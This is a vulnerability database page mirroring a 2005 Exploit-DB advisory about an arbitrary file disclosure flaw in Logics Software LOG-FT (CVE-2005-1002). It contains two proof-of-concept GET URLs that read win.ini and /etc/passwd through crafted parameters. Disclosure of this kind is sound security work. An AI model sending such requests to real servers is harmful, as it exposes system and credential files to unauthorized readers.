Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbPedro Viuales & Rom RamirezEDB-ID:25336
HistoryApr 05, 2005 - 12:00 a.m.

Logics Software LOG-FT - Arbitrary File Disclosure

2005-04-0500:00:00
Pedro Viuales & Rom Ramirez
www.exploit-db.com
17

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/12998/info

LOG-FT is reported prone to an arbitrary file disclosure vulnerability. This issue results from an access validation error and can allow a remote attacker to disclose sensitive data.

It is reported that an attacker can simply issue a specially crafted HTTP GET request to disclose sensitive files in the context of the affected Web server.

Information disclosed through this attack may expose sensitive data that may be used to carry out further attacks against a computer. It is not confirmed whether this issue may also allow an attacker to upload arbitrary files. 

http://www.example.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=c:\&VAR_FT_TMPL=winnt/win.ini

http://www.example.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=/etc&VAR_FT_TMPL=passwd

Related

cve 1
cvelist 1
nvd 1
cve
cve
CVE-2005-1002
2005-05-02 04:00:00
cvelist
cvelist
CVE-2005-1002
2005-04-07 04:00:00
nvd
nvd
CVE-2005-1002
2005-05-02 04:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:25336
cve1cvelist1nvd1